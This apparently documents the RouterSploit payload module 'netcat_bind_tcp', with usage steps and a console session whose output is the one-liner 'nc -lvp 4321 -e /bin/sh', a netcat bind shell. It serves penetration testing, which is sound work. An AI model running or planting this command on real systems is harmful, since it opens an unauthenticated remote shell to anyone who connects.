Description
Module generates payload that creates interactive tcp bind shell by using netcat one-liner.
Verification Steps
- Start
./rsf.py
- Do:
use payloads/cmd/netcat_bind_tcp
- Do:
set rport 4321
- Do:
run
- Module generates netcat tcp bind shell payload.
Scenarios
rsf > use payloads/cmd/netcat_bind_tcp
rsf (Netcat Bind TCP) > set rport 4321
[+] rport => 4321
rsf (Netcat Bind TCP) > run
[*] Running module...
[*] Generating payload
nc -lvp 4321 -e /bin/sh